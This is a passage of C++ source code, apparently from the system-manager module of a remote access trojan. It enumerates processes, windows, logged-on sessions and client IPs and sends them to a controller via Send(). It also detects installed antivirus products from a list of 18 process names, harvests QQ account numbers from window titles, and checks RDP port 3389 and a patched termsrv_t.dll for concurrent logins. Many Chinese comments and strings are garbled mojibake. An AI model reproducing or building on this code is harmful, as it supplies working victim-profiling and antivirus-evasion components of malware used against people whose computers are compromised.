lstrcpy(pszNtPath, szDrive);//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
lstrcat(pszNtPath, pszDosPath + cchDevName);//<2F><><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
||
return TRUE;
|
||
}
|
||
}
|
||
}
|
||
|
||
lstrcpy(pszNtPath, pszDosPath);
|
||
|
||
return FALSE;
|
||
}
|
||
|
||
BOOL GetProcessUserName(HANDLE hProcess, TCHAR * strProcessUser)
|
||
{
|
||
HANDLE hToken = NULL;
|
||
BOOL bFuncReturn = FALSE;
|
||
PTOKEN_USER pToken_User = NULL;
|
||
DWORD dwTokenUser = 0;
|
||
TCHAR szAccName[MAX_PATH] = {0};
|
||
TCHAR szDomainName[MAX_PATH] = {0};
|
||
HANDLE hProcessToken = NULL;
|
||
if(hProcess != NULL)
|
||
{
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̵<EFBFBD>Ȩ<EFBFBD><C8A8>
|
||
bFuncReturn = ::OpenProcessToken(hProcess,TOKEN_QUERY,&hToken);
|
||
if( bFuncReturn == 0) // ʧ<><CAA7>
|
||
return FALSE;
|
||
|
||
if(hToken != NULL)
|
||
{
|
||
::GetTokenInformation(hToken, TokenUser, NULL,0L, &dwTokenUser);
|
||
if(dwTokenUser>0)
|
||
{
|
||
pToken_User = (PTOKEN_USER)::GlobalAlloc( GPTR, dwTokenUser );
|
||
}
|
||
|
||
if(pToken_User != NULL)
|
||
{
|
||
bFuncReturn = ::GetTokenInformation(hToken, TokenUser, pToken_User, dwTokenUser, &dwTokenUser);
|
||
}
|
||
|
||
if(bFuncReturn != FALSE && pToken_User != NULL)
|
||
{
|
||
SID_NAME_USE eUse = SidTypeUnknown;
|
||
DWORD dwAccName = 0L;
|
||
DWORD dwDomainName = 0L;
|
||
PSID pSid = pToken_User->User.Sid;
|
||
bFuncReturn = ::LookupAccountSid(NULL, pSid, NULL, &dwAccName,
|
||
NULL,&dwDomainName,&eUse );
|
||
|
||
if(dwAccName>0 && dwAccName < MAX_PATH && dwDomainName>0 && dwDomainName <= MAX_PATH)
|
||
{
|
||
bFuncReturn = ::LookupAccountSid(NULL,pSid,szAccName,&dwAccName,
|
||
szDomainName,&dwDomainName,&eUse );
|
||
}
|
||
|
||
if( bFuncReturn != 0)
|
||
lstrcpy(strProcessUser,szAccName);
|
||
|
||
}
|
||
}
|
||
}
|
||
|
||
if (pToken_User != NULL)
|
||
::GlobalFree( pToken_User );
|
||
|
||
if(hToken != NULL)
|
||
::CloseHandle(hToken);
|
||
|
||
return TRUE;
|
||
}
|
||
|
||
LPBYTE CSystemManager::getProcessList()
|
||
{
|
||
HANDLE hSnapshot = NULL;
|
||
HANDLE hProcess = NULL;
|
||
HMODULE hModules = NULL;
|
||
PROCESSENTRY32 pe32 = {0};
|
||
DWORD cbNeeded;
|
||
char strProcessName[MAX_PATH] = {0};
|
||
char strProcessUser[MAX_PATH] = {0};
|
||
TCHAR szImagePath[MAX_PATH] ={0};
|
||
LPBYTE lpBuffer = NULL;
|
||
DWORD dwOffset = 0;
|
||
DWORD dwLength = 0;
|
||
DWORD dwWorkingSetSize = 0;
|
||
DWORD dwFileSize = 0;
|
||
PROCESS_MEMORY_COUNTERS pmc;
|
||
DebugPrivilege(SE_DEBUG_NAME, TRUE);
|
||
|
||
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||
|
||
if(hSnapshot == INVALID_HANDLE_VALUE)
|
||
return NULL;
|
||
|
||
pe32.dwSize = sizeof(PROCESSENTRY32);
|
||
|
||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);
|
||
|
||
lpBuffer[0] = TOKEN_PSLIST;
|
||
dwOffset = 1;
|
||
|
||
if(Process32First(hSnapshot, &pe32))
|
||
{
|
||
do
|
||
{
|
||
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID);
|
||
if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
|
||
{
|
||
EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
|
||
|
||
if(0 == GetProcessImageFileName(hProcess, szImagePath, MAX_PATH))
|
||
{
|
||
lstrcpy(strProcessName, "unknown erro");
|
||
|
||
}
|
||
else if(!DosPathToNtPath( szImagePath,strProcessName))
|
||
{
|
||
|
||
}
|
||
|
||
memset(strProcessUser,0,sizeof(strProcessUser));
|
||
if (GetProcessUserName(hProcess,strProcessUser))
|
||
{
|
||
if (lstrlen(strProcessUser) == 0)
|
||
{
|
||
lstrcpy(strProcessUser,"ERROR 2");
|
||
}
|
||
}
|
||
else
|
||
{
|
||
lstrcpy(strProcessUser,"ERROR 1");
|
||
}
|
||
|
||
// <20>˽<EFBFBD><CBBD><EFBFBD>ռ<EFBFBD><D5BC><EFBFBD><EFBFBD><EFBFBD>ݴ<EFBFBD>С
|
||
dwLength = sizeof(DWORD)*5 + lstrlen(pe32.szExeFile) + lstrlen(strProcessName) + lstrlen(strProcessUser) + 3;
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<CCAB><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>
|
||
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
|
||
dwOffset += sizeof(DWORD);
|
||
|
||
memcpy(lpBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1);
|
||
dwOffset += lstrlen(pe32.szExeFile) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, strProcessName, lstrlen(strProcessName) + 1);
|
||
dwOffset += lstrlen(strProcessName) + 1;
|
||
|
||
|
||
DWORD dwPriClass = GetPriorityClass(hProcess);
|
||
memcpy(lpBuffer + dwOffset, &dwPriClass, sizeof(DWORD) );
|
||
dwOffset += sizeof(DWORD);
|
||
|
||
dwPriClass = pe32.cntThreads;
|
||
memcpy(lpBuffer + dwOffset, &dwPriClass, sizeof(DWORD) );
|
||
dwOffset += sizeof(DWORD);
|
||
|
||
memcpy(lpBuffer + dwOffset, strProcessUser, lstrlen(strProcessUser) + 1);
|
||
dwOffset += lstrlen(strProcessUser) + 1;
|
||
|
||
ZeroMemory(&pmc,sizeof(pmc));
|
||
pmc.cb = sizeof(PROCESS_MEMORY_COUNTERS);
|
||
if (GetProcessMemoryInfo( hProcess, &pmc, sizeof(pmc)) )
|
||
{
|
||
dwWorkingSetSize = (DWORD)(pmc.WorkingSetSize/1024); //<2F><>λΪk
|
||
}
|
||
else
|
||
dwWorkingSetSize = 0;
|
||
|
||
memcpy(lpBuffer + dwOffset, &dwWorkingSetSize, sizeof(DWORD));
|
||
dwOffset += sizeof(DWORD);
|
||
|
||
|
||
HANDLE handle = CreateFile(strProcessName, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0);
|
||
if (handle != INVALID_HANDLE_VALUE)
|
||
{
|
||
dwFileSize = GetFileSize(handle, NULL) / 1024;
|
||
CloseHandle(handle);
|
||
}
|
||
else
|
||
dwFileSize = 0;
|
||
|
||
memcpy(lpBuffer + dwOffset, &dwFileSize, sizeof(DWORD));
|
||
dwOffset += sizeof(DWORD);
|
||
|
||
}
|
||
|
||
CloseHandle(hProcess);//<2F><><EFBFBD><EFBFBD>
|
||
}
|
||
while(Process32Next(hSnapshot, &pe32));
|
||
}
|
||
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
DebugPrivilege(SE_DEBUG_NAME, FALSE);
|
||
CloseHandle(hSnapshot);
|
||
return lpBuffer;
|
||
}
|
||
|
||
void CSystemManager::SendWindowsList()
|
||
{
|
||
LPBYTE lpBuffer = getWindowsList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
LPBYTE CSystemManager::getWindowsList()
|
||
{
|
||
LPBYTE lpBuffer = NULL;
|
||
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
|
||
lpBuffer[0] = TOKEN_WSLIST;
|
||
return lpBuffer;
|
||
}
|
||
|
||
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
|
||
{
|
||
if(!IsWindowVisible(hwnd))
|
||
return true;
|
||
|
||
DWORD dwLength = 0;
|
||
DWORD dwOffset = 0;
|
||
|
||
LPBYTE lpBuffer = *(LPBYTE *)lParam;
|
||
|
||
char strTitle[1024]={0};
|
||
try
|
||
{
|
||
if (!SendMessage(hwnd,WM_GETTEXT,sizeof(strTitle)-1,(LPARAM)strTitle))
|
||
return true;
|
||
|
||
strTitle[sizeof(strTitle)-1]=0;
|
||
|
||
if (lstrlen(strTitle) == 0)
|
||
return true;
|
||
|
||
if (lpBuffer == NULL)
|
||
{
|
||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
|
||
dwOffset=1;
|
||
}else
|
||
{
|
||
dwOffset = LocalSize(lpBuffer);
|
||
while(*(lpBuffer + dwOffset - 2)==0) dwOffset--;
|
||
}
|
||
|
||
dwLength = sizeof(DWORD) + sizeof(DWORD) + lstrlen(strTitle) + 1;
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
}catch (...)
|
||
{
|
||
return true;
|
||
}
|
||
|
||
GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
|
||
memcpy(lpBuffer + dwOffset + sizeof(DWORD) ,&hwnd,sizeof(DWORD));
|
||
|
||
memcpy(lpBuffer + dwOffset + sizeof(DWORD)*2, strTitle, lstrlen(strTitle) + 1);
|
||
|
||
*(LPBYTE *)lParam = lpBuffer;
|
||
return true;
|
||
}
|
||
|
||
|
||
void CSystemManager::SendUserStateList()
|
||
{
|
||
LPBYTE lpBuffer = getUserStateList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
void CSystemManager::SendSysUserList()
|
||
{
|
||
LPBYTE lpBuffer = getSysUserList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
|
||
bool GetSessionInfo(DWORD dwSessionId, char *str,_WTS_INFO_CLASS Class)
|
||
{
|
||
LPTSTR pBuffer = NULL;
|
||
DWORD dwBufferLen;
|
||
BOOL bRes = WTSQuerySessionInformation(WTS_CURRENT_SERVER_HANDLE,dwSessionId,Class, &pBuffer, &dwBufferLen);
|
||
if (bRes == FALSE)
|
||
{
|
||
return false;
|
||
}
|
||
|
||
if(Class == WTSClientAddress)
|
||
{
|
||
PWTS_CLIENT_ADDRESS pWTSCA = (PWTS_CLIENT_ADDRESS)pBuffer;
|
||
wsprintf(str, "%d.%d.%d.%d",pWTSCA->Address[2],pWTSCA->Address[3],pWTSCA->Address[4],pWTSCA->Address[5]);
|
||
}
|
||
else
|
||
{
|
||
lstrcpy(str,pBuffer);
|
||
}
|
||
|
||
WTSFreeMemory(pBuffer);
|
||
return true;
|
||
}
|
||
|
||
LPBYTE CSystemManager::getUserStateList()
|
||
{
|
||
LPBYTE lpBuffer = NULL;
|
||
DWORD dwOffset = 0;
|
||
DWORD dwLength = 0;
|
||
char ConnectionState[MAX_PATH];
|
||
|
||
PWTS_SESSION_INFO ppSessionInfo = NULL;
|
||
WTS_SESSION_INFO wts;
|
||
DWORD pCount = 0;
|
||
|
||
BOOL result = WTSEnumerateSessions(WTS_CURRENT_SERVER_HANDLE, 0, 1, &ppSessionInfo, &pCount);
|
||
if (result == FALSE)
|
||
return NULL;
|
||
|
||
char strUserName[256];
|
||
char strSessionId[256];
|
||
char strClientAddress[256];
|
||
char strWinStationName[256];
|
||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);
|
||
lpBuffer[0] = TOKEN_ASLIST;
|
||
dwOffset = 1;
|
||
|
||
for( DWORD i = 0; i < pCount; i++ )
|
||
{
|
||
wts = ppSessionInfo[i];
|
||
|
||
DWORD TSSessionId = wts.SessionId;
|
||
LPTSTR TSpWinStationName = wts.pWinStationName;
|
||
WTS_CONNECTSTATE_CLASS TSState = wts.State;
|
||
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
memset(strUserName,0,sizeof(strUserName));
|
||
GetSessionInfo(TSSessionId,strUserName,WTSUserName);
|
||
if(lstrlen(strUserName) == 0)
|
||
continue;
|
||
|
||
//<2F>Ự
|
||
memset(strWinStationName,0,sizeof(strWinStationName));
|
||
GetSessionInfo(TSSessionId,strWinStationName, WTSWinStationName);
|
||
//Զ<><D4B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>IP
|
||
memset(strClientAddress,0,sizeof(strClientAddress));
|
||
GetSessionInfo(TSSessionId,strClientAddress, WTSClientAddress);
|
||
//<2F>ỰID<49><44>ʶ
|
||
memset(strSessionId,0,sizeof(strSessionId));
|
||
GetSessionInfo(TSSessionId,strSessionId, WTSSessionId);
|
||
|
||
|
||
// <20>Ự״̬
|
||
memset(ConnectionState,0,sizeof(ConnectionState));
|
||
switch( TSState )
|
||
{
|
||
case WTSActive:
|
||
lstrcpy(ConnectionState,"Active");
|
||
break;
|
||
case WTSConnected:
|
||
lstrcpy(ConnectionState,"Connected");
|
||
break;
|
||
case WTSConnectQuery:
|
||
lstrcpy(ConnectionState,"ConnectQuery");
|
||
break;
|
||
case WTSShadow:
|
||
lstrcpy(ConnectionState,"Shadow");
|
||
break;
|
||
case WTSDisconnected:
|
||
lstrcpy(ConnectionState,"Disconnected");
|
||
break;
|
||
case WTSIdle:
|
||
lstrcpy(ConnectionState,"SIdle");
|
||
break;
|
||
case WTSListen:
|
||
lstrcpy(ConnectionState,"Listen");
|
||
break;
|
||
case WTSReset:
|
||
lstrcpy(ConnectionState,"Reset");
|
||
break;
|
||
case WTSDown:
|
||
lstrcpy(ConnectionState,"Down");
|
||
break;
|
||
case WTSInit:
|
||
lstrcpy(ConnectionState,"Init");
|
||
break;
|
||
default:
|
||
lstrcpy(ConnectionState,"error");
|
||
break;
|
||
}
|
||
|
||
|
||
dwLength = lstrlen(strUserName) + lstrlen(strSessionId) + lstrlen(strClientAddress) + lstrlen(strWinStationName) + lstrlen(ConnectionState) + 5;
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<CCAB><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>
|
||
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
memcpy(lpBuffer + dwOffset, strUserName, lstrlen(strUserName) + 1);
|
||
dwOffset += lstrlen(strUserName) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, strSessionId, lstrlen(strSessionId) + 1);
|
||
dwOffset += lstrlen(strSessionId) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, strClientAddress, lstrlen(strClientAddress) + 1);
|
||
dwOffset += lstrlen(strClientAddress) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, strWinStationName, lstrlen(strWinStationName) + 1);
|
||
dwOffset += lstrlen(strWinStationName) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, ConnectionState, lstrlen(ConnectionState) + 1);
|
||
dwOffset += lstrlen(ConnectionState) + 1;
|
||
}
|
||
|
||
// <20>ͷ<EFBFBD>
|
||
WTSFreeMemory(ppSessionInfo);
|
||
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
return lpBuffer;
|
||
}
|
||
|
||
|
||
void CSystemManager::SendSysInfoList()
|
||
{
|
||
LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, sizeof(tagSystemInfo)+1);
|
||
lpBuffer[0] = TOKEN_SSLIST;
|
||
if(lpBuffer == NULL)
|
||
return;
|
||
tagSystemInfo m_SysInfo;
|
||
GetSystemInfo(&m_SysInfo);
|
||
memcpy(lpBuffer + 1, &m_SysInfo, sizeof(tagSystemInfo));
|
||
Send(lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
//======================================================================================================================
|
||
BOOL GetTerminalState()
|
||
{
|
||
SC_HANDLE hSCManager, schService;
|
||
SERVICE_STATUS ssStatus;
|
||
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
|
||
if (hSCManager == NULL)
|
||
{
|
||
return FALSE;
|
||
}
|
||
schService = OpenService( hSCManager, "TermService", SERVICE_ALL_ACCESS);
|
||
if(schService == NULL)
|
||
{
|
||
return FALSE;
|
||
}
|
||
if (!QueryServiceStatus(schService, &ssStatus))
|
||
{
|
||
CloseServiceHandle(schService);
|
||
CloseServiceHandle(hSCManager);
|
||
return FALSE;
|
||
}
|
||
CloseServiceHandle(schService);
|
||
CloseServiceHandle(hSCManager);
|
||
if (ssStatus.dwCurrentState != SERVICE_RUNNING)
|
||
{
|
||
return FALSE;
|
||
}
|
||
return TRUE;
|
||
}
|
||
|
||
|
||
|
||
|
||
BOOL bFindTermsrvDll()
|
||
{
|
||
PROCESSENTRY32 pe32;
|
||
pe32.dwSize = sizeof(pe32);
|
||
char strDll[MAX_PATH];
|
||
BOOL bRet = FALSE;
|
||
GetSystemDirectory(strDll, sizeof(strDll));
|
||
lstrcat(strDll, "\\termsrv_t.dll");
|
||
|
||
|
||
CSystemManager::DebugPrivilege(SE_DEBUG_NAME, TRUE);
|
||
HANDLE hProcessSnap= CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
|
||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>صĽ<D8B5><C4BD><EFBFBD>
|
||
if(Process32First(hProcessSnap, &pe32))
|
||
{
|
||
do
|
||
{
|
||
HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, strDll);
|
||
if (hModuleHandle != NULL)
|
||
{
|
||
bRet = TRUE;
|
||
break;
|
||
}
|
||
|
||
}while (Process32Next(hProcessSnap,&pe32));
|
||
}
|
||
CloseHandle(hProcessSnap);
|
||
|
||
CSystemManager::DebugPrivilege(SE_DEBUG_NAME, FALSE);
|
||
|
||
return bRet;
|
||
}
|
||
|
||
void Get3389State( LPTSTR lpBuffer, UINT uSize)
|
||
{
|
||
memset(lpBuffer, 0, uSize);
|
||
|
||
if (!GetTerminalState())
|
||
{
|
||
lstrcpy(lpBuffer, "δ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>3389<EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
||
return;
|
||
}
|
||
|
||
char szCanConnect[32];
|
||
ReadRegEx(HKEY_LOCAL_MACHINE,
|
||
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
|
||
"fDenyTSConnections", REG_DWORD, szCanConnect, NULL, NULL, 0);
|
||
|
||
if (atoi(szCanConnect) != 0)
|
||
{
|
||
lstrcpy(lpBuffer, "δ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>3389");
|
||
return;
|
||
}
|
||
else if(!bIsOsXP())
|
||
{
|
||
lstrcpy(lpBuffer, "<EFBFBD>ѿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˫<EFBFBD><EFBFBD>");
|
||
return;
|
||
}
|
||
else
|
||
{
|
||
char szDllName[MAX_PATH];
|
||
ReadRegEx(HKEY_LOCAL_MACHINE,
|
||
"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters",
|
||
"ServiceDll", REG_EXPAND_SZ, szDllName, NULL, NULL, 0);
|
||
|
||
if (strstr(szDllName, "termsrv_t") == 0)
|
||
{
|
||
lstrcpy(lpBuffer, "<EFBFBD>ѿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>δ˫<EFBFBD><EFBFBD>");
|
||
return;
|
||
}
|
||
else
|
||
{
|
||
if (bFindTermsrvDll())
|
||
{
|
||
lstrcpy(lpBuffer, "<EFBFBD>ѿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˫<EFBFBD><EFBFBD>");
|
||
return;
|
||
}
|
||
else
|
||
{
|
||
lstrcpy(lpBuffer, "<EFBFBD>ѿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>δ˫<EFBFBD><EFBFBD>");
|
||
return;
|
||
}
|
||
}
|
||
}
|
||
return;
|
||
}
|
||
//======================================================================================================================
|
||
|
||
void GetAntivirus(char *AllName)
|
||
{
|
||
char *str[18][2] =
|
||
{
|
||
"360tray.exe","360<EFBFBD><EFBFBD>ȫ<EFBFBD><EFBFBD>ʿ",
|
||
"360sd.exe","360ɱ<EFBFBD><EFBFBD>",
|
||
"avp.exe","<EFBFBD><EFBFBD><EFBFBD><EFBFBD>˹<EFBFBD><EFBFBD>",
|
||
"kvmonxp.exe","<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",
|
||
"RavMonD.exe","<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",
|
||
"Mcshield.exe","<EFBFBD><EFBFBD>",
|
||
"egui.exe","NOD32",
|
||
"kxetray.exe","<EFBFBD><EFBFBD>ɽ",
|
||
"TMBMSRV.exe","<EFBFBD><EFBFBD><EFBFBD><EFBFBD>",
|
||
"Avgui.exe","AVG",
|
||
"Avastsvc.exe","Avast",
|
||
"avguard.exe","С<EFBFBD><EFBFBD>ɡ",
|
||
"bdagent.exe","<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",
|
||
"Msmpeng.exe","MSE",
|
||
"spider.exe","Dr.Web",
|
||
"ccapp.exe","Norton",
|
||
"v3lsvc.exe","V3",
|
||
"ayagent.aye","ҩ<EFBFBD><EFBFBD>"
|
||
};
|
||
|
||
PROCESSENTRY32 pe;
|
||
DWORD dwRet;
|
||
HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||
|
||
if (hSP)
|
||
{
|
||
for (int i = 0 ; i< 18; i++)
|
||
{
|
||
pe.dwSize = sizeof( pe );
|
||
|
||
for (dwRet = Process32First(hSP, &pe); dwRet; dwRet = Process32Next(hSP, &pe))
|
||
{
|
||
if (lstrcmpi( str[i][0], pe.szExeFile) == 0)
|
||
{
|
||
lstrcat(AllName , str[i][1]);
|
||
lstrcat(AllName , " ");
|
||
|
||
break;
|
||
}
|
||
}
|
||
}
|
||
}
|
||
|
||
CloseHandle(hSP);
|
||
|
||
if (lstrlen(AllName) == 0)
|
||
lstrcpy(AllName,"δ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
||
|
||
return;
|
||
}
|
||
|
||
UINT Get3389Port( LPTSTR lpBuffer, UINT uSize)
|
||
{
|
||
char strSubKey[MAX_PATH] = {0};
|
||
memset(lpBuffer, 0, uSize);
|
||
|
||
lstrcpy(strSubKey, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp");
|
||
|
||
ReadRegEx(HKEY_LOCAL_MACHINE, strSubKey, "PortNumber", REG_DWORD, (char *)lpBuffer, NULL, uSize, 0);
|
||
|
||
if (lstrlen(lpBuffer) == 0)
|
||
lstrcpy(lpBuffer,"<EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
||
|
||
return lstrlen(lpBuffer);
|
||
}
|
||
|
||
|
||
void Get_LogUser(char *lpUserName,DWORD nNameLen)
|
||
{
|
||
DWORD dwProcessID = GetProcessID("explorer.exe");
|
||
if (dwProcessID == 0)
|
||
return ;
|
||
|
||
BOOL fResult = FALSE;
|
||
HANDLE hProc = NULL;
|
||
HANDLE hToken = NULL;
|
||
TOKEN_USER *pTokenUser = NULL;
|
||
|
||
__try
|
||
{
|
||
// Open the process with PROCESS_QUERY_INFORMATION access
|
||
hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID);
|
||
if (hProc == NULL)
|
||
{
|
||
__leave;
|
||
}
|
||
fResult = OpenProcessToken(hProc, TOKEN_QUERY, &hToken);
|
||
if(!fResult)
|
||
{
|
||
__leave;
|
||
}
|
||
|
||
DWORD dwNeedLen = 0;
|
||
fResult = GetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen);
|
||
if (dwNeedLen > 0)
|
||
{
|
||
pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen];
|
||
fResult = GetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen);
|
||
if (!fResult)
|
||
{
|
||
__leave;
|
||
}
|
||
}
|
||
else
|
||
{
|
||
__leave;
|
||
}
|
||
|
||
SID_NAME_USE sn;
|
||
TCHAR szDomainName[MAX_PATH];
|
||
DWORD dwDmLen = MAX_PATH;
|
||
|
||
fResult = LookupAccountSid(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen,
|
||
szDomainName, &dwDmLen, &sn);
|
||
}
|
||
__finally
|
||
{
|
||
if (hProc)
|
||
::CloseHandle(hProc);
|
||
if (hToken)
|
||
::CloseHandle(hToken);
|
||
if (pTokenUser)
|
||
delete[] (char*)pTokenUser;
|
||
}
|
||
}
|
||
|
||
char *GetQQ()
|
||
{
|
||
char *szQQNum = new char[2048];
|
||
memset(szQQNum, 0, 260);
|
||
char szText[2048] = {0};
|
||
char szQQNumber[2048] = {0};
|
||
HWND hWnd = FindWindowA("CTXOPConntion_Class", NULL);
|
||
|
||
while (hWnd)
|
||
{
|
||
char szClassName[MAX_PATH] = {0};
|
||
GetClassName(hWnd, szClassName, MAX_PATH);
|
||
if (strcmp(szClassName, "CTXOPConntion_Class") == 0)
|
||
{
|
||
// <20>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD>OP_12345678<37><38><EFBFBD>ַ<EFBFBD><D6B7><EFBFBD>
|
||
if (hWnd)
|
||
{
|
||
GetWindowText(hWnd, szText, MAX_PATH);
|
||
}
|
||
// <20>õ<EFBFBD>12345678 qq<71><71>
|
||
int len = strlen(szText);
|
||
do
|
||
{
|
||
len--;
|
||
} while (szText[len] != '_');
|
||
strcpy(szQQNumber, &szText[len+1]);
|
||
//printf("%s\n", szText);
|
||
//printf("%s\n", szQQNumber);
|
||
//printf("%s\n", szClassName);
|
||
if (lstrlen(szQQNum) != 0)
|
||
{
|
||
strcat(szQQNum, "|");
|
||
}
|
||
strcat(szQQNum, szQQNumber);
|
||
}
|
||
hWnd = GetWindow(hWnd, GW_HWNDNEXT);
|
||
}
|
||
if (lstrlen(szQQNum) == 0)
|
||
{
|
||
strcpy(szQQNum, "-/-");
|
||
}
|
||
return szQQNum;
|
||
}
|
||
|
||
void CSystemManager::GetSystemInfo(tagSystemInfo* pSysInfo)
|
||
{
|
||
ZeroMemory(pSysInfo,sizeof(tagSystemInfo));
|
||
//<2F><>ȡCPU<50><55>Ϣ===============================
|
||
if(
|
||
!ReadRegEx
|
||
(
|
||
HKEY_LOCAL_MACHINE,
|
||
"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0",
|
||
"ProcessorNameString",
|
||
REG_SZ,
|
||
pSysInfo->szCpuInfo,
|
||
NULL,
|
||
lstrlen(pSysInfo->szCpuInfo),
|
||
0)
|
||
)
|
||
strcpy(pSysInfo->szCpuInfo,"Find CPU infomation error");
|
||
|
||
//<2F><>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>============================
|
||
DWORD dwTime,dwDay,dwHour,dwMin;
|
||
dwTime = GetTickCount();
|
||
dwDay = dwTime / (1000 * 60 * 60 * 24);
|
||
dwTime = dwTime % (1000 * 60 * 60 * 24);
|
||
dwHour = dwTime / (1000 * 60 * 60);
|
||
dwTime = dwTime % (1000 * 60 * 60);
|
||
dwMin = dwTime / (1000 * 60);
|
||
wsprintf(pSysInfo->szActiveTime, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> %d<><64> %dСʱ %d<><64><EFBFBD><EFBFBD>", dwDay,dwHour,dwMin);
|
||
char *szQQNum = GetQQ();
|
||
strcpy(pSysInfo->szQQ, szQQNum);
|
||
delete []szQQNum;
|
||
//<2F><>ȡɱ<C8A1><C9B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>========================
|
||
GetAntivirus(pSysInfo->szAntiVirus);
|
||
|
||
//<2F><>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>========================
|
||
gethostname(pSysInfo->szPcName,sizeof(pSysInfo->szPcName));
|
||
|
||
